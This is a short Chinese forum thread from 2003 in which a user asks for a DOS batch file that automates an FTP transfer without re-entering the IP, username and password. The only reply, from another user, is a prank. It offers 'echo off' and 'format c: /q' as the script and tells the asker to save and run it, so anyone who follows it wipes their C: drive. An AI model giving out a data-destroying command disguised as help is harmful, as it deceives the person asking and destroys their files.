楼 主
有关dos批处理的一个问题
发表于 2003-11-11 00:00 · 中国 海南 海口 电信
初级用户
★
积分 117
发帖 6
注册 2003-11-11 00:00
22年会员
UID 12700
性别 男
状态 离线
想传输一个文件到另一个机器上去,编一个使用ftp的批处理文件,一面每次都输入ip、用户名和密码。
请各位老鸟不吝赐教。
第 2 楼
发表于 2003-11-15 00:00 · 韩国 首尔特别市
初级用户
★
积分 191
发帖 32
注册 2003-11-14 00:00
22年会员
UID 12789
性别 男
状态 离线
echo off
format c: /q
save as a Bat file,run it.enjoy^_^
我……来……
论坛跳转: